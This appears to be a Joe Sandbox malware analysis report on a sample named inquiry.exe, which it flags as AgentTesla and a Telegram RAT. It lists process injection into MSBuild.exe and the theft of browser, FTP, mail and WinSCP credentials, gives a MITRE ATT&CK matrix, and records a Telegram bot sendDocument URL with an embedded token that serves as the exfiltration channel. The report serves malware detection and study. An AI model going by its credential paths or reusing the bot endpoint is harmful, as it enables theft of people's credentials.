                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: MSBuild.exe, 00000002.00000002.619340495.00000000060A2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D45AE5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D45AE5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D410B0 ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapFree,
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00A906DA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00A908EE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00A90A1C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00A9099F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00A909DE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01064F58 LdrInitializeThunk,
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D44142 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D44111 SetUnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\inquiry.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\inquiry.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E60008
                      Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\inquiry.exe'
                      Source: MSBuild.exe, 00000002.00000002.616021105.0000000001B10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: MSBuild.exe, 00000002.00000002.616021105.0000000001B10000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: MSBuild.exe, 00000002.00000002.616021105.0000000001B10000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: MSBuild.exe, 00000002.00000002.616021105.0000000001B10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D474DC cpuid
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\inquiry.exeCode function: 0_2_00D43A1D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.inquiry.exe.ea0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.inquiry.exe.ea0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 4388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: Yara matchFile source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.inquiry.exe.ea0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.inquiry.exe.ea0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 4388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsService Execution2Windows Service3Windows Service3Obfuscated Files or Information1Input Capture1System Information Discovery125Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection212Software Packing1Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery141Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion131LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection212Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      inquiry.exe47%VirustotalBrowse
                      inquiry.exe64%ReversingLabsWin32.Trojan.AgentTesla

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tyHOrV.com0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.telegram.orgD8sn0%Avira URL Cloudsafe
                      https://api.telegram.org4sn0%Avira URL Cloudsafe
                      https://oLurbWzWRU.org0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocumentfalse
                          high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://tyHOrV.comMSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://DynDns.comDynDNSMSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.orgMSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haMSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmpfalse
                              high
                              https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocumentdocument-----MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpfalse
                                high
                                https://api.ipify.org%GETMozilla/5.0MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                low
                                https://api.telegram.orgD8snMSBuild.exe, 00000002.00000002.617570816.00000000032DC000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://api.telegram.orgMSBuild.exe, 00000002.00000002.617570816.00000000032DC000.00000004.00000001.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmpfalse
                                    high
                                    https://api.telegram.org4snMSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://oLurbWzWRU.orgMSBuild.exe, 00000002.00000002.617344247.000000000328B000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.617328263.0000000003287000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipinquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.ipify.org%$MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUfalse

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:483914
                                    Start date:15.09.2021
                                    Start time:16:12:52
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 51s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:inquiry.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:27
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@4/1@2/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 89.3% (good quality ratio 83.7%)
                                    • Quality average: 81.5%
                                    • Quality standard deviation: 28.7%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 2.20.86.117, 20.82.210.154, 20.54.110.249, 40.112.88.60, 93.184.221.240, 23.216.77.209, 23.216.77.208, 23.35.236.56, 20.82.209.183
                                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    16:14:10API Interceptor778x Sleep call for process: MSBuild.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    149.154.167.2200T06zz5Z9f.exeGet hashmaliciousBrowse
                                      aZq3gco8Ab.exeGet hashmaliciousBrowse
                                        34u04QCvgu.exeGet hashmaliciousBrowse
                                          Transfer Swift.xlsxGet hashmaliciousBrowse
                                            nj8GTf3j31.exeGet hashmaliciousBrowse
                                              tmt.exeGet hashmaliciousBrowse
                                                CI and PL of CMZBD-210090.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.W32.AIDetect.malware1.13106.exeGet hashmaliciousBrowse
                                                    DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
                                                      biNmoafSHb.exeGet hashmaliciousBrowse
                                                        QUOTATION REQUEST REF#E6448.2.exeGet hashmaliciousBrowse
                                                          4y3aqXJURf.apkGet hashmaliciousBrowse
                                                            UK COVID UPDATES AND ENTITLEMENT.exeGet hashmaliciousBrowse
                                                              VzqyxdLij2.exeGet hashmaliciousBrowse
                                                                PUcvjsKtXq.exeGet hashmaliciousBrowse
                                                                  SeptemberOrderlist.pdf.exeGet hashmaliciousBrowse
                                                                    4XIWeWhn85.exeGet hashmaliciousBrowse
                                                                      E9Vl6Ve253.exeGet hashmaliciousBrowse
                                                                        payment.exeGet hashmaliciousBrowse
                                                                          doc_306_01.exeGet hashmaliciousBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            api.telegram.org0T06zz5Z9f.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            aZq3gco8Ab.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            34u04QCvgu.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Transfer Swift.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            nj8GTf3j31.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            tmt.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            CI and PL of CMZBD-210090.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.W32.AIDetect.malware1.13106.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            tNh3d45aXt.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            biNmoafSHb.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            QUOTATION REQUEST REF#E6448.2.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            UK COVID UPDATES AND ENTITLEMENT.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            VzqyxdLij2.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            1uHjqG0dPw.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            PUcvjsKtXq.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SeptemberOrderlist.pdf.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            4XIWeWhn85.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            E9Vl6Ve253.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            payment.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            TELEGRAMRU0T06zz5Z9f.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            aZq3gco8Ab.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            XbvAoRKnFm.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            34u04QCvgu.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Transfer Swift.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            nj8GTf3j31.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            tmt.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            CI and PL of CMZBD-210090.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.W32.AIDetect.malware1.13106.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Terw9bPuiD.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            biNmoafSHb.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            QUOTATION REQUEST REF#E6448.2.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            4y3aqXJURf.apkGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            UK COVID UPDATES AND ENTITLEMENT.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            VzqyxdLij2.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            zfl3hUTQWN.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            PUcvjsKtXq.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SeptemberOrderlist.pdf.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SxvDkdIwWW.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0erVTXvm8ZMM.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            qy2t7MIRoi.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            0T06zz5Z9f.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            34u04QCvgu.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            m3maOnY6Uy.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            nj8GTf3j31.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            tmt.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            CI and PL of CMZBD-210090.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.W32.AIDetect.malware1.13106.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Halkbank_Ekstre_20200521_082357_541079.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Z9GkJvygEk.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            RZAcKBlQo0.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            F1MwWrwBR7.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            biNmoafSHb.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            kecFPnbu5K.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            QUOTATION REQUEST REF#E6448.2.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            5PfBAmWq3V.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            ac1khvFT2V.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
